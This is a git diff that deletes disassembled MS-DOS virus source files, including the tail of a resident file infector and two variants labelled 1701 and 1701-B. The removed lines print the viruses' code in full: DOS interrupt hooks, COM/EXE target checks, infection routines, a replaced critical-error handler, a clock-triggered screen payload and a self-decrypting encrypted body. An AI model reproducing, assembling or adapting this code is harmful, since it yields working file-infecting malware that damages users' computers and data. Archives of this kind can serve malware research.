- jmp short loc_22 - db 90h -loc_20: - cmp ah,11h - jne loc_21 ; Jump if not equal - call sub_8 - iret ; Interrupt return -loc_21: - cmp ah,12h - jne loc_22 ; Jump if not equal - call sub_11 - iret ; Interrupt return -loc_22: - jmp dword ptr cs:data_17 - -; -; SUBROUTINE -; - -sub_8 proc near - mov al,57h ; 'W' - int 21h ; DOS Services ah=function 00h - ; terminate, cs=progm seg prefx - push ax - push cx - push dx - push bx - push bp - push si - push di - push ds - push es - push cs - pop ds - push cs - pop es - mov byte ptr cs:data_47,0 - nop - call sub_9 - jnz loc_23 ; Jump if not zero - call sub_3 
- jz loc_23 ; Jump if zero - call sub_16 - dec data_47 -loc_23: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near - push cs - pop es - push cs - pop es - cld ; Clear direction - call sub_10 - jnc loc_24 ; Jump if carry=0 - cmp di,0 - retn -loc_24: - mov di,offset data_44 ; ('A:MIO.COM') - mov al,2Eh ; '.' - mov cx,0Bh - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - cmp word ptr [di],4F43h - jne loc_25 ; Jump if not equal - cmp byte ptr [di+2],4Dh ; 'M' - jne loc_25 ; Jump if not equal - mov byte ptr data_53,43h ; 'C' - nop - retn -loc_25: - cmp word ptr [di],5845h - jne loc_ret_26 ; Jump if not equal - cmp byte ptr [di+2],45h ; 'E' - jne loc_ret_26 ; Jump if not equal - mov byte ptr data_53,45h ; 'E' - nop - -loc_ret_26: - retn -sub_9 endp - - -; -; SUBROUTINE -; - -sub_10 proc near -loc_27: - push ds - mov si,cs:data_34 - mov ax,cs:data_35 - mov ds,ax - mov di,offset data_44 ; ('A:MIO.COM') - lodsb ; String [si] to al - cmp al,0FFh - jne loc_28 ; Jump if not equal - add si,6 - lodsb ; String [si] to al - jmp short loc_29 - db 90h -loc_28: - cmp al,5 - jb loc_29 ; Jump if below - pop ds - stc ; Set carry flag - retn -loc_29: - mov cx,0Bh - cmp al,0 - je locloop_30 ; Jump if equal - add al,40h ; '@' - stosb ; Store al to es:[di] - mov al,3Ah ; ':' - stosb ; Store al to es:[di] - -locloop_30: - lodsb ; String [si] to al - cmp al,20h ; ' ' - je loc_31 ; Jump if equal - stosb ; Store al to es:[di] - jmp short loc_32 - db 90h -loc_31: - cmp byte ptr es:[di-1],2Eh ; '.' - je loc_32 ; Jump if equal - mov al,2Eh ; '.' 
- stosb ; Store al to es:[di] -loc_32: - loop locloop_30 ; Loop if cx > 0 - - mov al,0 - stosb ; Store al to es:[di] - pop ds - clc ; Clear carry flag - retn -sub_10 endp - - -; -; SUBROUTINE -; - -sub_11 proc near - mov al,57h ; 'W' - int 21h ; DOS Services ah=function 00h - ; terminate, cs=progm seg prefx - push ax - push cx - push dx - push bx - push bp - push si - push di - push ds - push es - push cs - pop ds - push cs - pop es - cmp byte ptr cs:data_47,0 - je loc_33 ; Jump if equal - jmp short loc_34 - db 90h -loc_33: - call sub_9 - jnz loc_34 ; Jump if not zero - call sub_3 - jz loc_34 ; Jump if zero - call sub_16 - dec data_47 - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - retn -loc_34: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - retn -sub_11 endp - -data_47 db 0 - -; -; SUBROUTINE -; - -sub_12 proc near - push ax - push ds - pop ax - mov cs:data_35,ax - mov cs:data_34,dx - pop ax - retn -sub_12 endp - - -; -; SUBROUTINE -; - -sub_13 proc near - push cs - mov al,0 - out 20h,al ; port 20h, 8259-1 int command - mov ax,3524h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov data_40,bx - mov bx,es - mov data_39,bx - pop es - mov si,offset data_43 - mov di,offset data_44 ; ('A:MIO.COM') - mov cx,0Fh - -locloop_35: - lodsb ; String [si] to al - add al,20h ; ' ' - stosb ; Store al to es:[di] - loop locloop_35 ; Loop if cx > 0 - - retn -sub_13 endp - - -; -; SUBROUTINE -; - -sub_14 proc near - push ax - push cs - pop ds - push cs - pop es - mov bl,data_41 - cmp bl,0Ch - ja loc_37 ; Jump if above - cmp bl,0 - je loc_37 ; Jump if equal - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - cmp al,0Ch - ja loc_37 ; Jump if above - cmp al,0 - je loc_37 ; Jump if equal - cmp al,bl - je loc_37 ; Jump if equal - inc bl - call sub_15 - cmp al,bl - je loc_37 ; Jump if equal - inc bl - call sub_15 - 
cmp al,bl - je loc_37 ; Jump if equal - pop ds - call sub_17 - push cs - pop ds - retn - -; External Entry into Subroutine - -sub_15: - cmp bl,0Ch - jbe loc_ret_36 ; Jump if below or = - sub bl,0Ch - -loc_ret_36: - retn -loc_37: - pop ax - retn -sub_14 endp - - -; -; SUBROUTINE -; - -sub_16 proc near - mov dx,offset int_24h_entry - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - cmp byte ptr data_53,43h ; 'C' - jne loc_38 ; Jump if not equal - call sub_4 - jmp short loc_39 - db 90h -loc_38: - call sub_5 -loc_39: - push ds - mov dx,data_40 - mov ax,data_39 - mov ds,ax - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - retn -sub_16 endp - - -; -; -; External Entry Point -; -; - -int_24h_entry proc far - mov al,3 - iret ; Interrupt return -int_24h_entry endp - - -; -; SUBROUTINE -; - -sub_17 proc near -;* mov dx,offset loc_47 ;* - db 0BAh,0B0h, 06h - mov ax,251Ch - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov byte ptr ds:data_56e,90h - nop - mov ax,0B800h - mov es,ax - mov di,data_55e - mov ax,720h - mov cx,0Bh - repne stosw ; Rep zf=0+cx >0 Store ax to es:[di] - push cs - pop es - retn -sub_17 endp - - db 0, 0 -data_48 db 0 -data_49 dw 720h -data_50 db 0Fh - db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh - db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh - db 0Ah, 0Fh, 08h,0FEh, 0Eh -data_51 db 0EEh - db 0Ch -data_52 db 90h - db 0FBh, 50h, 51h, 52h, 53h, 55h - db 56h, 57h, 1Eh, 06h, 0Eh, 1Fh - db 0EBh, 0Bh, 90h -loc_40: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - iret ; Interrupt return - db 0B8h, 00h,0B8h, 8Eh,0C0h - db 0BFh,0A0h, 0Fh - db 0BEh, 9Ah, 06h,0B9h, 16h, 00h - db 0F2h,0A4h, 80h, 3Eh,0AEh, 06h - db 0EEh, 74h, 08h,0C6h, 06h,0AEh - db 06h,0EEh,0EBh, 06h, 90h -loc_42: - mov data_51,0F0h -loc_43: - mov ax,es:[di] - mov ah,0Eh - mov data_49,ax - mov data_48,0 - jmp short loc_40 - db 0BFh, 00h, 00h -loc_44: - mov si,offset data_50 
- push di - mov cx,12h - cld ; Clear direction - repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] - pop di - jz loc_45 ; Jump if zero - inc di - inc di - cmp di,0FA0h - jne loc_44 ; Jump if not equal - mov di,0 -loc_45: - cmp di,0F9Eh - jne loc_ret_46 ; Jump if not equal - mov data_52,0CFh - -loc_ret_46: - retn -data_53 db 43h - db 0Ch, 0Ah, 45h, 00h,0CBh, 87h - db 0BFh, 1Dh, 25h, 1Eh, 57h, 9Ah - db 83h, 00h,0CBh, 87h,0E8h - db 2Eh - -seg_a ends - - - - end start
diff --git a/0-9/1701 (3).ASM b/0-9/1701 (3).ASM
deleted file mode 100755
index 922e594..0000000
--- a/0-9/1701 (3).ASM
+++ /dev/null
@@ -1,427 +0,0 @@ - -PAGE 59,132 - -; -; -; 1701 -; -; Created: 11-Feb-92 -; Passes: 5 Analysis Options on: none -; -; - -data_31e equ 27D1h ;* -data_36e equ 4CD6h ;* -data_39e equ 6950h ;* -data_45e equ 8848h ;* -data_50e equ 0BDF1h ;* -data_53e equ 0CBC7h ;* -data_55e equ 0EA36h ;* -data_58e equ 49F2h -data_59e equ 0B0E0h -data_60e equ 0BCF1h -data_61e equ 0EAEFh - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -1701 proc far - -start: - jmp loc_2 - db 39 dup (0) -data_22 db 0 ; Data table (indexed access) - db 58 dup (0) -loc_2: - cli ; Disable interrupts - mov bp,sp - call sub_1 - -1701 endp - -; -; SUBROUTINE -; - -sub_1 proc near - pop bx - sub bx,131h - test cs:data_22[bx],1 - jz $+11h ; Jump if zero - lea si,[bx+14Dh] ; Load effective addr - mov sp,682h -loc_4: - xor [si],si - xor [si],sp - inc si - dec sp - jnz loc_4 ; Jump if not zero - db 8Eh,0EBh,0E5h,0BDh, 62h,0F6h - db 0F7h, 06h,0EFh,0EEh,0EEh, 2Fh - db 0C2h,0E6h,0E6h,0E2h,0B1h, 11h - db 0EEh, 02h, 6Ch,0F8h, 36h,0EAh - db 3Bh,0DCh,0E0h,0C3h,0C2h,0C6h - db 0E6h,0C2h - -locloop_5: - mov si,dx - push es - db 0F1h, 60h,0D4h,0ABh, 69h, 96h - db 0EEh,0EEh,0E2h, 0Bh, 06h,0DBh - db 0E2h - db 0E2h,0EEh,0EEh,0F2h,0FAh,0F6h - db 0F6h -loc_7: - db 0F2h,0F2h, 7Ah, 87h, 61h -loc_9: - test ah,[di-80h] - add byte ptr [bp+si-7171h],0F6h - jc loc_9 ; Jump if carry Set - div dl ; al, ah rem = ax/reg - db 0F2h,0EEh,0EEh,0E2h,0E3h, 1Bh - db 16h,0C2h - db 0C2h,0CEh - db 0CEh, 1Ah,0F2h,0F6h,0ADh, 73h - db 19h, 6Dh,0CFh,0ECh, 4Eh, 49h - db 92h,0C3h,0ECh, 47h, 49h,0A4h - db 0F3h,0D8h, 7Dh, 75h,0AAh,0EFh - db 4Dh,0E2h,0E3h,0C8h, 6Ch, 65h - db 0B8h,0EFh, 4Ch,0F0h,0F3h,0A5h - db 42h,0C2h, 3Fh, 2Fh, 56h, 3Dh - db 03h, 77h, 14h,0B9h,0FEh, 46h - db 3Eh, 0Eh,0C1h, 00h, 3Bh,0D3h - db 73h, 11h, 44h,0B7h, 97h,0E9h - db 94h,0F4h - db 19h,0F0h,0E9h,0DCh, 79h, 71h - db 0A0h,0F3h,0DCh, 31h, 61h, 90h - db 0C3h, 95h, 7Eh,0E3h,0F7h, 03h - db 0EFh, 79h, 31h,0ADh,0D8h, 7Bh - db 75h, 8Fh,0EFh,0CCh, 6Eh, 61h - db 
85h,0E3h, 5Ah,0EEh, 1Eh, 7Ch - db 32h, 49h,0FEh, 12h, 73h,0B3h - db 0CDh,0CDh,0F7h, 9Dh, 07h,0FFh - db 80h,0DEh,0DCh, 87h,0E6h, 77h - db 8Bh,0F6h,0DCh -loc_14: - into ; Int 4 on overflow - db 9Bh,0EFh, 63h, 9Bh,0E0h,0ABh - db 0A0h, 9Bh,0E8h, 71h, 8Fh,0FEh - db 0BBh, 86h, 45h, 76h,0B5h,0C2h - db 4Eh, 0Bh, 8Bh, 4Ch, 07h,0E0h - db 45h,0C4h,0E4h,0F6h,0D0h, 7Bh - db 0C4h,0EFh,0EEh,0C4h, 69h,0F0h - db 0E5h,0E2h,0C4h, 4Dh,0EDh,0F2h - db 0D4h, 30h,0F0h,0F2h,0F2h, 43h - db 25h,0D2h, 48h, 43h, 05h,0EAh - db 47h, 80h,0CBh,0A1h, 46h,0A6h - db 7Dh, 2Fh, 3Fh,0CFh,0B5h,0D1h - db 1Dh,0E0h,0F1h,0B5h, 6Fh, 51h - db 20h,0F5h, 79h, 01h - db 4Fh - db 57h,0F4h, 33h, 3Dh, 66h,0C4h -loc_16: - dec bx - dec cx - mov dl,0C0h - lahf ; Load ah from flags - add ax,7EDCh - jns loc_14 ; Jump if not sign - db 0F3h, 7Fh, 61h,0C4h,0E3h, 11h - db 42h,0C8h, 6Eh,0ECh,0D8h,0EEh - db 0BFh, 7Ch, 33h,0D0h - db 7Bh,0E4h, 8Dh, 8Eh,0A4h, 44h - db 80h - db 86h, 82h,0D8h,0A8h, 02h,0FCh - db 0F3h -loc_19: - div byte ptr [bp+di+377Ch] ; al,ah rem = ax/data - lock jmp $-211h -sub_1 endp - - db 6Bh, 51h,0C8h,0E3h, 51h,0EEh - db 0F3h, 4Bh, 53h,0F0h, 0Eh, 01h - db 6Ah,0C8h, 4Fh,0C4h, 42h,0C4h - db 92h - db 9 - db 0E0h, 09h,0F4h,0DEh,0F6h,0F6h - db 0F2h,0DCh, 62h,0E0h,0F4h,0E2h - db 0F8h, 6Bh,0F4h,0FEh,0EDh,0E0h - db 0EDh, 4Ah,0D7h,0D3h, 3Fh,0D3h - db 11h,0BBh, 19h,0B9h, 87h, 07h - db 0CEh, 22h,0E7h,0FCh,0F2h, 46h - db 0DCh, 3Bh,0D3h, 73h, 17h, 2Ah - db 0E5h, 95h, 83h, 92h,0C8h, 63h - db 17h, 52h,0F5h, 87h,0ABh,0E8h - db 4Ah,0DAh,0FBh, 03h,0E3h,0ECh - db 4Fh,0D8h,0F9h,0C3h,0E0h - db 42h - db 0F4h,0CFh,0F7h, 4Eh,0DAh,0D7h - db 54h,0CCh,0E5h,0ECh,0F9h, 2Bh - db 0C3h,0FDh,0C0h, 6Eh,0FCh,0A5h - db 0F7h,0FEh, 19h,0F4h, 1Eh, 0Eh -loc_22: - jl loc_19 ; Jump if < - hlt ; Halt processor - mov dl,6Ah ; 'j' - dec word ptr ds:data_55e[si] - out 1Eh,ax ; port 1Eh ??I/O Non-standard - jc loc_22 ; Jump if carry Set - mov dl,0C0h - dec bp - mov sp,0C8E3h - inc bp - and bl,0C0h - sub sp,si - xchg ax,si - div di ; ax,dx rem=dx:ax/reg - 
db 0F2h, 4Ah,0D2h,0FBh, 0Fh,0E3h - db 0E8h, 4Fh,0DCh,0F1h,0CFh,0E0h - db 7Eh,0F4h - db 0C3h,0F7h,0ECh, 4Ah,0F2h,0CBh - db 58h, 5Fh,0E0h,0E8h,0FDh, 2Fh - db 0CFh,0F1h, 49h, 24h, 09h, 1Fh - db 65h, 0Ch, 8Eh,0F2h, 49h, 76h - db 16h, 28h,0FDh, 2Ch, 39h, 0Fh - db 4Dh, 58h,0A3h,0D8h, 36h,0F4h - db 0D9h,0EFh, 6Eh, 28h, 29h,0DAh - db 1Dh, 96h, 1Fh,0D2h,0F2h, 87h - db 1Eh, 6Ah,0A2h,0A1h, 9Fh, 9Ch - db 94h, 95h, 93h,0C0h,0DCh,0ECh - db 47h,0D8h,0B5h,0F3h,0D8h, 7Ah - db 0ECh,0BBh,0EFh,0E0h,0E5h, 5Ah - db 0E6h,0DBh, 2Fh,0C3h, 9Ch,0B8h - db 79h, 2Ah, 4Eh,0F6h,0A5h, 3Fh - db 0AFh,0A0h, 0Bh, 94h,0C5h, 87h - db 0ACh, 0Bh, 80h,0CBh,0F3h, 46h - db 0C9h,0F8h,0EDh, 48h,0C0h,0EFh - db 5Bh,0E1h,0E6h, 2Bh,0C3h, 90h - db 0D9h,0D5h, 33h, 87h,0C5h, 4Eh - db 0F0h,0B0h,0FDh, 07h,0F1h, 10h - db 0Bh,0E7h,0ECh, 61h, 85h - db 0CFh,0DCh, 7Bh,0E0h,0BBh,0F3h - db 46h,0D0h, 23h,0C3h,0CCh, 67h - db 0D8h,0CCh,0E3h,0A3h,0B4h, 87h - db 0F1h, 1Fh, 31h,0F2h,0DCh, 8Dh - db 37h, 48h, 04h, 01h, 76h, 0Ch - db 2Bh, 88h, 37h,0BEh,0F3h,0CDh - db 0Fh, 84h,0F1h, 07h, 5Dh,0E2h - db 0CCh, 66h,0D8h,0CCh,0E3h, 07h - db 9Bh,0FCh,0DCh - db 57h -loc_27: - mov bp,0F7F3h - xchg ax,di - aaa ; Ascii adjust - in al,dx ; port 0C0h, DMA-2 bas&add ch 0 - stc ; Set carry flag - db 0C0h,0E9h - db 0C3h,0B6h, 29h, 76h,0F2h,0B1h - db 0D8h, 33h,0E4h,0B5h,0EFh, 23h - db 0C3h, 90h, 3Dh,0C8h, 6Bh,0ECh - db 0AFh,0EFh, 72h, 03h,0D6h, 00h - db 33h,0D5h,0FAh, 87h, 3Ah, 83h - db 0C5h,0B5h, 4Bh, 4Fh,0AFh - db 0FCh, 37h, 4Ah,0F4h - db 0CBh, 3Fh,0D3h, 9Ch, 50h, 69h - db 3Ah, 5Eh,0E4h,0A0h,0D1h, 27h - db 0DDh, 20h, 3Fh,0D7h, 1Eh,0A2h - db 0F1h,0BDh,0D6h, 7Ah,0C2h, 84h - db 0E8h, 49h,0CCh, 83h,0CFh,0DCh - db 79h,0E0h,0BDh,0F3h, 3Fh,0CFh - db 5Ah,0A2h,0D1h, 2Fh, 2Bh,0C3h - db 09h,0CFh, 7Eh - db 4Ah,0F2h,0B4h,0C5h, 3Bh,0C1h - db 0DCh,0C3h, 23h, 70h, 13h, 28h - db 0A3h, 49h, 0Fh, 0Bh, 0Ch, 0Dh - db 0D8h, 55h,0A2h,0F3h, 5Ah,0AEh - db 58h,0ADh,0E7h, 5Fh,0E1h,0E2h - db 23h,0CFh, 4Ah,0F3h,0A1h,0D8h - db 79h,0E4h, 8Dh,0CFh,0ECh, 49h - db 0C8h, 83h,0C3h, 
0Fh,0EFh, 7Ah - db 0CCh, 3Fh,0D7h,0D8h, 79h,0FCh - db 0AFh,0EFh, 14h, 23h,0E1h, 93h - db 0E7h, 14h, 2Fh,0CEh, 87h,0F8h - db 4Eh,0F7h,0B1h,0DCh, 4Bh, 98h - db 0C5h, 83h, 4Bh,0A7h, 9Dh, 85h - db 0D3h,0D1h,0ACh,0A8h,0AFh,0ADh - db 0AAh, 6Fh, 07h, 5Ch, 1Ch,0FCh - db 0E8h -loc_33: - stc ; Set carry flag - mov cl,0B3h - mov sp,4BBEh - cmc ; Complement carry - db 0F6h, 4Dh, 86h,0F3h, 31h,0F9h - db 49h, 85h, 38h,0D7h,0C5h, 89h - db 85h - db 2Ch, 05h,0AAh,0E7h,0F1h, 79h - db 0E5h,0B6h,0E5h, 22h, 96h,0E4h - db 11h, 00h, 69h, 2Ch,0B4h,0ABh - db 0A9h,0E9h, 35h,0ECh,0F4h, 58h - db 58h, 52h, 0Dh, 00h,0BEh, 43h - db 03h, 81h,0D6h, 4Ch, 94h,0F7h - db 48h, 9Eh,0F2h, 57h,0E6h,0E2h - db 1Eh, 15h, 43h,0BBh,0BDh,0B0h - db 0E9h,0EDh, 31h,0A0h,0E8h,0A0h - db 78h, 08h, 38h,0E4h, 90h,0C7h - db 70h,0C2h,0C1h - db 0Ch - db 1Fh, 12h,0F1h,0F0h,0ACh,0F3h - db 79h, 1Eh, 18h,0E4h,0B6h,0E7h - db 19h, 6Ch,0FCh,0B6h,0EFh, 86h - db 0E0h, 4Ch, 2Ch,0F1h, 08h, 62h - db 26h, 8Ah,0F7h, 8Fh, 2Eh, 83h - db 0F7h, 79h, 62h, 5Ah,0F3h, 82h - db 0Dh, 5Fh - db 09h,0B4h,0F1h,0BCh, 21h,0B1h - db 0E0h,0B0h,0B1h, 65h, 36h, 78h - db 34h, 00h,0D0h,0A0h,0F3h, 78h - db 0CEh,0C1h, 00h, 17h, 26h,0C1h - db 0C4h, 94h,0CFh, 79h, 0Ah, 00h - db 0F0h,0A6h,0F3h, 11h, 60h,0E4h - db 0BAh,0E7h, 92h,0F0h, 58h, 34h - db 0EDh, 08h, 1Eh, 5Eh,0FEh, 87h - db 0FBh,0A6h, 0Fh, 77h,0F5h,0EAh - db 0AEh, 03h, 76h,0F5h, 85h, 31h - db 58h, 0Dh,0ADh,0A8h,0F5h,0B1h - db 2Dh,0B3h,0B3h, 6Dh,0E8h,0BEh - db 0E3h, 0Ch, 10h,0ABh, 10h, 00h - db 0AFh, 31h,0A2h, 2Ah,0AFh,0F6h - db 0C0h,0E2h, 38h, 24h,0A3h, 96h - db 0Dh,0CEh,0F2h, 82h,0FCh,0CEh - db 0D2h, 9Ah,0E8h,0DEh, 1Dh, 92h - db 0E4h, 1Ah, 21h, 17h, 2Dh,0CEh - db 42h, 84h,0F0h,0CEh, 2Dh,0F9h - db 8Ch, 7Bh, 41h, 7Eh, 45h, 9Ch - db 3Ah,0CEh, 8Eh, 7Ch, 2Ah, 0Dh - db 57h, 9Eh,0F2h,0D5h,0E8h, 8Eh - db 0E2h, 92h, 1Ch,0D1h -loc_37: - sub cx,[bx-7Eh] - db 0F2h,0B3h, 82h,0E3h,0C9h,0F4h - db 0A2h,0CEh,0B6h, 35h,0D9h, 4Dh - db 03h,0F1h, 1Ch, 77h,0FDh,0F2h - db 01h, 07h,0DCh, 51h,0B2h,0EFh - db 21h,0ABh - db 0Dh, 
08h - db 24h,0E4h - db 0BDh,0EFh,0EAh,0ECh, 4Eh,0B6h - db 0F2h, 7Ch,0D6h,0ACh, 4Fh, 01h - db 1Ah,0A6h, 5Bh, 00h,0BFh,0F2h - db 49h,0C2h,0E7h, 41h,0F2h,0F4h - db 0BBh, 23h,0F2h,0BFh,0E1h, 66h - db 18h, 1Dh, 9Ah,0EAh, 7Ah,0E4h - db 0A5h,0F7h, 46h,0FDh, 03h,0DEh - db 4Ah,0E4h, 94h,0C7h, 04h,0C4h - db 9Ah,0CFh,0F2h, 35h,0F0h,0AEh - db 0F3h,0F2h, 5Eh,0D2h,0E5h, 96h - db 0D0h, 94h - db 0E1h, 0Bh, 0Eh,0EEh, 35h,0F4h - db 0AEh,0F7h,0F2h, 4Ah,0B2h, 8Dh - db 0F5h - -locloop_40: - movsw ; Mov [si] to es:[di] -;* mov dx,offset loc_46 ;* - db 0BAh, 84h,0F0h - mov ax,ds:data_45e - cmpsb ; Cmp [si] to es:[di] - db 0F3h,0F7h, 56h,0A1h,0F3h, 10h - db 2Eh, 14h,0C4h,0B4h,0E7h, 41h - db 80h,0EFh, 4Fh, 96h,0F3h,0CDh - db 0F0h, 90h,0F3h,0B8h,0CDh, 63h - db 0A0h,0C7h, 2Eh,0A9h, 3Ch, 8Eh - db 45h, 02h,0C1h, 09h,0B1h, 53h - db 90h,0EFh, 3Fh, 02h,0D9h, 1Eh - db 90h,0E1h, 0Bh, 4Eh,0EEh, 72h - db 0FCh,0A1h,0F7h,0F0h, 52h, 5Ch - db 0Fh,0B6h, 02h,0EEh, 4Ah,0FCh - db 88h,0DEh,0AEh,0A1h,0F3h, 42h - db 0F6h, 1Ah,0B0h, 10h, 64h, 12h - db 0Ah, 60h, 18h, 0Ah,0F3h, 11h - db 9Ch, 20h, 1Ah,0EAh, 09h, 80h - db 3Fh, 6Ch, 9Bh,0C3h, 4Ah,0E0h - db 90h,0C3h, 48h,0C0h, 9Dh,0F3h - db 47h,0F6h, 08h, 34h,0C8h,0D8h - db 0BDh,0E3h, 95h,0B4h, 0Eh, 86h - db 1Ch,0D4h,0C8h,0A4h,0F3h, 83h - db 0BFh, 1Ah, 1Bh, 70h,0FCh,0AAh - db 6Ah, 72h, 78h,0F0h,0BDh, 70h - db 48h,0C8h,0C4h,0A5h,0F7h, 85h - db 0C5h, 06h,0A7h, 1Ch,0D8h,0C0h - db 0B0h,0E3h, 97h,0C0h, 06h, 3Ch - db 0Ch, 85h, 13h, 1Ah, 4Ch, 30h - db 30h, 0Ch, 2Ah,0F0h, 38h, 60h - db 97h,0CFh, 30h, 34h, 72h,0D0h - db 0A1h,0F3h, 0Fh, 10h, 20h, 52h - db 0C2h, 0Eh,0BBh, 1Ch, 1Ch, 28h - db 4Eh,0A7h,0F3h, 1Eh,0A3h, 0Ch - db 11h, 0Ah,0E7h, 8Dh,0FDh, 4Eh - db 0ECh,0A5h,0F5h, 09h, 58h,0F2h - db 0F0h, 82h,0F5h, 1Bh,0AEh, 11h - db 06h, 69h, 1Ch,0A8h, 92h,0E1h - db 0Bh,0BFh, 11h, 16h, 93h,0D2h - db 0Ah, 14h, 93h, 0Dh,0E0h, 34h - db 0C4h, 91h,0C7h,0CBh,0B7h, 96h - db 0E0h, 72h,0FCh,0A1h,0F7h,0F3h - db 0DCh, 11h,0E0h,0BCh,0E3h, 93h - db 0A3h,0FCh - -locloop_41: - in al,0E0h ; port 0E0h, 
Memory encode reg2 - db 0F1h,0FCh,0F5h,0A6h,0A5h,0A3h - db 0A0h,0D8h,0D9h,0D7h, 32h,0A6h - db 60h,0A2h, 23h,0EEh, 8Fh,0CFh - db 0CAh,0F2h, 85h,0F1h, 4Ah,0D6h - db 0EAh, 0Ah, 9Ch, 1Bh,0A6h, 41h - db 0BCh,0EFh, 4Dh, 92h,0F3h, 1Eh - db 61h, 0Ch, 4Ah,0CDh,0CEh, 2Ah - db 0ACh, 3Bh, 86h, 35h,0E4h,0AAh - db 0CFh, 81h,0F1h, 4Eh, 09h, 0Dh - db 51h, 8Ah,0EFh,0BFh,0BDh,0B8h - db 0BCh,0BBh,0B9h,0B6h,0E9h,0EDh - db 0DCh, 76h,0D0h,0A5h,0F3h,0F0h - db 20h,0FDh, 2Ch, 35h, 07h, 2Ch - db 0F4h, 08h, 59h,0F3h,0FAh, 82h - db 0EBh,0A2h,0A3h,0BCh, 5Ah,0C8h - db 2Fh,0C7h, 67h, 1Bh, 26h,0E9h - db 9Ch,0FFh, 85h,0F3h - -locloop_42: - jbe loc_45 ; Jump if below or = - clc ; Clear carry flag - mov sp,0ECC8h - inc dx - loopnz locloop_41 ; Loop if zf=0, cx>0 - - retn - db 35h, 94h - db 97h - db 0AAh -loc_45: - esc 4,[bx+di] ; coprocessor escape - esc 0,cl ; coprocessor escape - db 0F3h,0E8h,0BDh, 56h,0AAh, 5Dh - db 8Dh,0E2h, 2Fh,0CFh,0B5h, 81h - db 0F1h, 0Fh,0F1h, 31h,0DCh, 48h - db 88h, 82h, 83h, 87h, 08h, 42h - db 8Ch, 91h,0BDh, 0Dh, 4Ch,0F6h - db 0F7h, 4Bh, 57h,0E8h, 12h, 11h - db 46h, 59h,0C5h,0E2h, 5Ch,0CDh - db 0EFh,0F1h,0C4h,0BDh,0F7h, 4Bh - db 70h,0C8h,0E8h,0F3h,0F7h,0E0h - db 0F7h,0CFh, 85h, 88h, 2Ch, 04h - db 7Ch, 2Eh, 42h,0B2h,0C1h, 3Ch - db 57h, 47h,0E4h, 2Bh,0C7h, 7Eh - db 0B2h, 5Ah,0A7h, 3Fh,0D3h,0AEh - db 6Bh,0FCh,0EDh, 7Ch,0BBh, 36h - db 0CCh, 7Ch,0BFh, 0Ah,0F5h,0C2h - -seg_a ends - - - - end start diff --git a/0-9/1701-B (4).ASM b/0-9/1701-B (4).ASM deleted file mode 100755 index c302c84..0000000 --- a/0-9/1701-B (4).ASM +++ /dev/null 
@@ -1,424 +0,0 @@ - -PAGE 59,132 - -; -; -; 1701-B -; -; Created: 11-Feb-92 -; Passes: 5 Analysis Options on: none -; -; - -data_31e equ 27D1h ;* -data_36e equ 4CD6h ;* -data_39e equ 6950h ;* -data_45e equ 8848h ;* -data_50e equ 0BDF1h ;* -data_53e equ 0CBC7h ;* -data_56e equ 0EA36h ;* -data_59e equ 49F2h -data_60e equ 0B0E0h -data_61e equ 0BCF1h -data_62e equ 0EAEFh - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -1701-b proc far - -start: - jmp loc_3 - db 39 dup (0) -data_22 db 0 ; Data table (indexed access) - db 30 dup (0) - db 28 dup (0) -loc_3: - cli ; Disable interrupts - mov bp,sp - call sub_1 - -1701-b endp - -; -; SUBROUTINE -; - -sub_1 proc near - pop bx - sub bx,131h - test cs:data_22[bx],1 - jz $+11h ; Jump if zero - lea si,[bx+14Dh] ; Load effective addr - mov sp,682h -loc_5: - xor [si],si - xor [si],sp - inc si - dec sp - jnz loc_5 ; Jump if not zero - db 8Eh,0EBh,0E5h,0BDh, 62h,0F6h - db 0F7h, 06h,0EFh,0EEh,0EEh, 2Fh - db 0C2h,0E6h,0E6h,0E2h,0B1h, 11h - db 0EEh, 02h, 6Ch,0F8h, 36h,0EAh - db 0B7h,0DAh,0D0h,0C0h,0C2h,0C6h - db 0E6h,0C2h - -locloop_6: - mov si,dx - xchg dh,bh - db 60h,0D4h,0ABh, 69h, 96h,0EEh - db 0EEh,0E2h, 0Bh,0A0h,0EFh,0E2h - db 0E2h,0EEh,0EEh,0F2h,0FAh,0F6h - db 0F6h -loc_8: - db 0F2h,0F2h, 30h, 8Ch,0FEh, 8Bh - db 0FAh, 8Fh, 82h, 82h, 8Fh, 8Eh - db 0B9h, 45h,0F6h,0F6h,0F2h,0F2h - db 0EEh,0EEh,0E2h,0E3h, 1Bh, 16h - db 0C2h - db 0C2h,0CEh - db 0CEh, 1Ah,0F2h,0F6h,0ADh, 73h - db 19h, 6Dh,0CFh,0ECh, 4Eh, 49h - db 92h,0C3h,0ECh, 47h, 49h,0A4h - db 0F3h,0D8h, 7Dh, 75h,0AAh,0EFh - db 4Dh,0E2h,0E3h,0C8h, 6Ch, 65h - db 0B8h,0EFh, 4Ch,0F0h,0F3h,0A5h - db 42h,0C2h, 3Fh, 2Fh, 56h, 3Dh - db 03h, 77h, 14h,0B9h,0FEh, 46h - db 3Eh, 0Eh,0C1h, 00h, 3Bh,0D3h - db 73h, 11h, 44h,0B7h, 97h,0E9h - db 94h,0F4h - db 19h,0F0h,0E9h,0DCh, 79h, 71h - db 0A0h,0F3h,0DCh, 31h, 61h, 90h - db 0C3h, 95h, 7Eh,0E3h,0F7h, 03h - db 0EFh, 79h, 31h,0ADh,0D8h, 7Bh - db 75h, 8Fh,0EFh,0CCh, 6Eh, 61h - db 85h,0E3h, 5Ah,0EEh, 1Eh, 